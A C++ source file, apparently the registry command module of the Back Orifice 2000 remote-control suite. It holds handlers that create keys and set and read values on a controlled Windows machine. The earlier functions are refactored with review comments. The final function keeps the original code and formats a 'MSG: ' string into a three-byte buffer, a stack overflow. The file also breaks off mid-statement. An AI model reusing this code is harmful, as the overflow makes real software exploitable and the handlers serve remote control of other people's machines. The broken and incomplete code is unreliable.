📄 cmd_registry.cpp
/* Back Orifice 2000 - Remote Administration Suite
Copyright (C) 1999, Cult Of The Dead Cow
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
The author of this program may be contacted at dildog@l0pht.com. */
#include "stdafx.h"
#include "..\\Ctrl_Srvr9.h"
#include "..\\MainFrm.h"
#include "cmd_registry.h"
#include "strhandle.h"
#include "func_bo.h"
/*
 * Maps the root-hive name at the front of a registry path to its predefined
 * HKEY and returns the remainder of the path.
 *
 * svPath - path such as "HKLM\\Software\\Foo"; one or two leading backslashes
 *          are skipped. The buffer is passed to BreakString(), which
 *          presumably terminates the first component in place (the
 *          whole-string comparisons below rely on that), so the caller's
 *          buffer is modified.
 * pKey   - receives the predefined root handle; not written on failure.
 *
 * Returns whatever BreakString() returned for the text after the root name,
 * or NULL when svPath is NULL or the root name is not recognised.
 * NOTE(review): if BreakString() returns NULL when no separator is present,
 * a path that names only a root ("HKLM") is indistinguishable from an
 * invalid root for the caller - confirm against strhandle.
 */
char *GetRootKey(char *svPath, HKEY *pKey)
{
    // Long and abbreviated spellings accepted for each predefined root.
    static const struct {
        const char *svLong;
        const char *svShort;
        HKEY hRoot;
    } aRoots[] = {
        { "HKEY_CLASSES_ROOT",   "HKCR", HKEY_CLASSES_ROOT   },
        { "HKEY_CURRENT_USER",   "HKCU", HKEY_CURRENT_USER   },
        { "HKEY_LOCAL_MACHINE",  "HKLM", HKEY_LOCAL_MACHINE  },
        { "HKEY_USERS",          "HKU",  HKEY_USERS          },
        { "HKEY_CURRENT_CONFIG", "HKCC", HKEY_CURRENT_CONFIG },
        { "HKEY_DYN_DATA",       "HKDD", HKEY_DYN_DATA       },
    };

    if (svPath == NULL)
        return NULL;

    // Skip "\\" or "\" in front of the root name.
    if (svPath[0] == '\\')
        svPath += (svPath[1] == '\\') ? 2 : 1;

    char *svRest = BreakString(svPath, "\\");

    for (int i = 0; i < (int)(sizeof(aRoots) / sizeof(aRoots[0])); i++) {
        if (lstrcmpi(svPath, aRoots[i].svLong) == 0 ||
            lstrcmpi(svPath, aRoots[i].svShort) == 0) {
            *pKey = aRoots[i].hRoot;
            return svRest;
        }
    }

    // Unknown root name.
    return NULL;
}
// True for the predefined root handles that GetRootKey() can hand out.
// CmdProc_RegCreateKey() skips RegCloseKey() for these.
static bool RegCreate_IsPredefinedRoot(HKEY hKey)
{
    return hKey == HKEY_LOCAL_MACHINE || hKey == HKEY_USERS ||
           hKey == HKEY_CLASSES_ROOT || hKey == HKEY_CURRENT_USER ||
           hKey == HKEY_CURRENT_CONFIG || hKey == HKEY_DYN_DATA;
}

/*
 * Creates (or opens) every key along the given registry path and reports the
 * number of keys that were newly created through the main window's
 * SendStringMsg().
 *
 * strRegName - full path starting with a root name; it is split in place by
 *              GetRootKey()/BreakString().
 *
 * Returns 0 on success, -1 when the root name is invalid or a component
 * cannot be created/opened.
 */
int CmdProc_RegCreateKey(char *strRegName)
{
    CMainFrame *pFrame = (CMainFrame *)AfxGetApp()->m_pMainWnd;
    char svReply[1024];

    // Resolve the root hive; svPart then points at the first subkey name.
    HKEY hCur;
    char *svPart = GetRootKey(strRegName, &hCur);
    if (svPart == NULL) {
        pFrame->SendStringMsg("MSG: Could not create key. Invalid root key.");
        return -1;
    }

    // Walk the path one component at a time. Intermediate keys are requested
    // with KEY_READ; the last component additionally with KEY_WRITE.
    int nCreated = 0;
    DWORD dwAccess = KEY_READ;
    while (svPart != NULL) {
        char *svRest = BreakString(svPart, "\\");
        if (svRest == NULL)
            dwAccess = KEY_READ | KEY_WRITE;

        HKEY hChild;
        DWORD dwDisp;
        LONG lRes = RegCreateKeyEx(hCur, svPart, 0, "", REG_OPTION_NON_VOLATILE,
                                   dwAccess, NULL, &hChild, &dwDisp);

        // The parent handle is finished with whether or not the call worked.
        if (!RegCreate_IsPredefinedRoot(hCur))
            RegCloseKey(hCur);

        if (lRes != ERROR_SUCCESS) {
            // %.256s keeps the component name well inside svReply.
            wsprintf(svReply, "MSG: Could not create key. Unable to open subkey: %.256s", svPart);
            pFrame->SendStringMsg((LPCTSTR)svReply);
            return -1;
        }

        if (dwDisp == REG_CREATED_NEW_KEY)
            nCreated++;

        hCur = hChild;
        svPart = svRest;
    }

    if (!RegCreate_IsPredefinedRoot(hCur))
        RegCloseKey(hCur);

    // Report number of keys created in the process.
    wsprintf(svReply,
             (nCreated == 1) ? "MSG: Created %d key." : "MSG: Created %d keys.",
             nCreated);
    pFrame->SendStringMsg((LPCTSTR)svReply);
    return 0;
}
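// True for the predefined root handles that GetRootKey() can hand out.
// CmdProc_RegSetValue() skips RegCloseKey() for these.
static bool RegSet_IsPredefinedRoot(HKEY hKey)
{
    return hKey == HKEY_LOCAL_MACHINE || hKey == HKEY_USERS ||
           hKey == HKEY_CLASSES_ROOT || hKey == HKEY_CURRENT_USER ||
           hKey == HKEY_CURRENT_CONFIG || hKey == HKEY_DYN_DATA;
}

// Value of one upper-case hex digit. Any other character counts as 0, which
// keeps the lenient parsing of the original loops.
static unsigned RegSet_HexDigit(char ch)
{
    if (ch >= 'A' && ch <= 'F') return (unsigned)(ch - 'A' + 0xA);
    if (ch >= '0' && ch <= '9') return (unsigned)(ch - '0');
    return 0;
}

/*
 * Parses a value description of the form "T(name):data" and writes it under
 * the given registry key.
 *
 * strRegName  - key path starting with a root name; split in place.
 * strRegValue - value description; split and upper-cased/unescaped in place.
 *               The first character of T selects the type:
 *               B = REG_BINARY (space-separated hex bytes), D = REG_DWORD
 *               (decimal, or hex with a 0x prefix), S = REG_SZ,
 *               M = REG_MULTI_SZ (Windows NT only), E = REG_EXPAND_SZ.
 *
 * Returns 0 on success, 1 when the value description cannot be split, and -1
 * for every other failure (bad root, unknown type, allocation failure, key
 * cannot be opened, value cannot be written).
 *
 * The data buffers are sized from text that arrives with the command, so each
 * branch below bounds its writes by the allocation it made.
 */
int CmdProc_RegSetValue(char *strRegName, char *strRegValue)
{
    char svBuffer[1024];
    CMainFrame *pMainWnd = (CMainFrame *)AfxGetApp()->m_pMainWnd;

    // Get root key
    HKEY key;
    char *svKey = GetRootKey(strRegName, &key);
    if (svKey == NULL) {
        pMainWnd->SendStringMsg("MSG: Could not set value. Invalid root key");
        return -1;
    }

    // Get registry value type/name/data
    char *svType = strRegValue;
    char *svName = (svType != NULL) ? BreakString(svType, "(") : NULL;
    if (svName == NULL) {
        pMainWnd->SendStringMsg("MSG: Could not set value. Invalid value name string.");
        return 1;
    }
    char *svData = BreakString(svName, "):");
    if (svData == NULL) {
        pMainWnd->SendStringMsg("MSG: Could not set value. Invalid value name string.");
        return 1;
    }
    CharUpper(svType);

    // Process value type and parse data
    DWORD dwType = REG_NONE;
    char *pData = NULL;
    char *svNext;
    int nDataLen = 0;

    switch (svType[0]) {
    case 'B': {
        dwType = REG_BINARY;
        // Every token yields one byte. The original sized the buffer as
        // strlen/3, which is too small for "AA BB CC" (8 chars, 3 bytes) and
        // for single-digit tokens. strlen+1 covers one token per separator
        // plus one; the loop also stops at that capacity in case
        // BreakString() splits differently than assumed.
        int nCap = lstrlen(svData) + 1;
        pData = (char *)malloc(nCap);
        if (pData == NULL) break;
        CharUpper(svData);
        while (svData != NULL && nDataLen < nCap) {
            svNext = BreakString(svData, " ");
            // unsigned: shifting a negative signed char is not well defined
            unsigned char c = 0;
            for (; *svData; svData++)
                c = (unsigned char)((c << 4) | RegSet_HexDigit(*svData));
            pData[nDataLen++] = (char)c;
            svData = svNext;
        }
        break;
    }
    case 'D': {
        dwType = REG_DWORD;
        nDataLen = (int)sizeof(DWORD);
        pData = (char *)malloc(sizeof(DWORD));
        if (pData == NULL) break;
        CharUpper(svData);
        DWORD val;
        if (strncmp(svData, "0X", 2) == 0) {
            val = 0;
            for (svData += 2; *svData; svData++)
                val = (val << 4) | RegSet_HexDigit(*svData);
        } else {
            val = (DWORD)atol(svData);
        }
        *(DWORD *)pData = val;   // malloc() storage is suitably aligned
        break;
    }
    case 'S':
    case 'E':
        dwType = (svType[0] == 'S') ? REG_SZ : REG_EXPAND_SZ;
        // Unescape before measuring so the allocation matches what is copied.
        UnescapeString(svData);
        pData = (char *)malloc(lstrlen(svData) + 1);
        if (pData == NULL) break;
        lstrcpy(pData, svData);
        nDataLen = lstrlen(pData) + 1;
        break;
    case 'M': {
        if (!g_bIsWinNT) {
            pMainWnd->SendStringMsg("MSG: Could not set value. MULTI_SZ only supported by Windows NT.");
            return -1;
        }
        dwType = REG_MULTI_SZ;
        int nOrigLen = lstrlen(svData);
        pData = (char *)malloc(nOrigLen + 2);
        if (pData == NULL) break;
        UnescapeString(svData);
        // The original scanned pData without ever filling it, i.e. it read
        // uninitialised heap memory and wrote that to the registry. Copy the
        // unescaped text first. nOrigLen+1 bytes is the extent of the input
        // buffer before unescaping (assumes UnescapeString() works in place
        // and never lengthens the string - TODO confirm).
        memcpy(pData, svData, nOrigLen + 1);
        pData[nOrigLen + 1] = '\0';
        // The unescaped text may contain embedded NULs, so look for the
        // double NUL instead of using lstrlen().
        while (nDataLen < nOrigLen &&
               !(pData[nDataLen] == '\0' && pData[nDataLen + 1] == '\0'))
            nDataLen++;
        pData[nDataLen] = '\0';
        pData[nDataLen + 1] = '\0';
        // cbData for REG_MULTI_SZ has to include both terminators.
        nDataLen += 2;
        break;
    }
    default:
        wsprintf(svBuffer, "MSG: Could not set value. Unknown data type '%c'. Valid types are B,D,S,M,E.", svType[0]);
        pMainWnd->SendStringMsg((LPCTSTR)svBuffer);
        return -1;
    }

    if (pData == NULL) {
        // malloc() failed in one of the branches above.
        pMainWnd->SendStringMsg("MSG: Could not set value. Out of memory.");
        return -1;
    }

    // Open key hierarchy. Intermediate keys are opened with KEY_READ; the
    // last component additionally with KEY_WRITE.
    HKEY subkey;
    DWORD dwPerm = KEY_READ;
    while (svKey != NULL) {
        svNext = BreakString(svKey, "\\");
        if (svNext == NULL) dwPerm = KEY_READ | KEY_WRITE;

        LONG lOpen = RegOpenKeyEx(key, svKey, 0, dwPerm, &subkey);
        if (!RegSet_IsPredefinedRoot(key))
            RegCloseKey(key);
        if (lOpen != ERROR_SUCCESS) {
            wsprintf(svBuffer, "MSG: Unable to open subkey: %.256s", svKey);
            pMainWnd->SendStringMsg((LPCTSTR)svBuffer);
            free(pData);
            return -1;
        }
        key = subkey;
        svKey = svNext;
    }

    // Write value. The original ignored the result and always returned 0.
    LONG lSet = RegSetValueEx(key, svName, 0, dwType, (BYTE *)pData, nDataLen);

    // Same predefined-root test as everywhere else; the original left
    // HKEY_CURRENT_CONFIG and HKEY_DYN_DATA out of this last check.
    if (!RegSet_IsPredefinedRoot(key))
        RegCloseKey(key);
    free(pData);

    if (lSet != ERROR_SUCCESS) {
        pMainWnd->SendStringMsg("MSG: Could not set value. Unable to write value.");
        return -1;
    }
    return 0;
}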
int CmdProc_RegGetValue(char *strRegName, char *strRegValue)
{
char svBuffer[1024];
CMainFrame *pMainWnd = (CMainFrame *)AfxGetApp ()->m_pMainWnd;
// Get root key
char *svKey,*svNext;
HKEY key;
svKey=GetRootKey(strRegName,&key);
if(svKey==NULL)
{
pMainWnd->SendStringMsg ("MSG: Could not open key. Invalid root key.");
// IssueAuthCommandReply(cas_from,comid,0,"Could not open key. Invalid root key.");
return -1;
}
// Open key hierarchy
HKEY subkey;
DWORD dwPerm=KEY_READ;
while(svKey!=NULL)
{
svNext=BreakString(svKey,"\\");
if(svNext==NULL) dwPerm=KEY_WRITE | KEY_READ;
if(RegOpenKeyEx(key, svKey, 0, dwPerm, &subkey) != ERROR_SUCCESS) {
if(key!=HKEY_LOCAL_MACHINE && key!=HKEY_USERS && key!=HKEY_CLASSES_ROOT && key!=HKEY_CURRENT_USER && key!=HKEY_CURRENT_CONFIG && key!=HKEY_DYN_DATA)
RegCloseKey(key);
wsprintf(svBuffer,"MSG: Could not open key. Unable to open subkey: %.256s", svKey);
pMainWnd->SendStringMsg ((LPCTSTR)svBuffer);
// IssueAuthCommandReply(cas_from,comid,0,svBuffer);
return -1;
}
if(key!=HKEY_LOCAL_MACHINE && key!=HKEY_USERS && key!=HKEY_CLASSES_ROOT && key!=HKEY_CURRENT_USER && key!=HKEY_CURRENT_CONFIG && key!=HKEY_DYN_DATA)
RegCloseKey(key);
key = subkey;
svKey = svNext;
}
BYTE *pData;
DWORD dwType,dwLen;
RegQueryValueEx(key,strRegValue,NULL,&dwType,NULL,&dwLen);
if(dwLen>=8192)
{
RegCloseKey(key);
pMainWnd->SendStringMsg ("MSG: Could not get value. Value too long.");
// IssueAuthCommandReply(cas_from,comid,0,"Could not get value. Value too long.");
return -1;
}
pData=(BYTE *)malloc(dwLen);
RegQueryValueEx(key,strRegValue,NULL,&dwType,pData,&dwLen);
wsprintf(svBuffer,"MSG: Value: %lu bytes.",dwLen);
pMainWnd->SendStringMsg ((LPCTSTR)svBuffer);
// IssueAuthCommandReply(cas_from,comid,1,svBuffer);
// Process value type and parse data
char svStr[260],*svPtr,*svMem,*sv;
DWORD dw,dwCount;
switch(dwType)
{
case REG_BINARY:
dw=0;
while(dw<dwLen)
{
svStr[0]='\0';
dwCount=min(dwLen-dw,16);
while(dwCount>0)
{
char svByte[3];
if(dwCount==1)
{
wsprintf(svByte,"MSG: %2.2X",*(pData+dw));
lstrcat(svStr,svByte);
}
else
{
wsprintf(svByte,"MSG: %2.2X ",*(pData+dw));
lstrcat(svStr,svByte);
}
dw++;
dwCount--;
}
pMainWnd->SendStringMsg ((LPCTSTR)svStr);
// IssueAuthCommandReply(cas_from,comid,1,svStr);
}
break;
case REG_DWORD:
wsprintf(svStr,"MSG: %lu",*(DWORD *)pData);
pMainWnd->SendStringMsg ((LPCTSTR)svStr);
// IssueAuthCommandReply(cas_from,comid,1,svStr);
break;
case REG_EXPAND_SZ:
case REG_SZ:
svPtr=EscapeString((char *)pData);
svMem=(char *)malloc(lstrlen(svPtr)+7);;//+2);
lstrcpy (svMem,"MSG: ");
lstrcat(svMem,svPtr);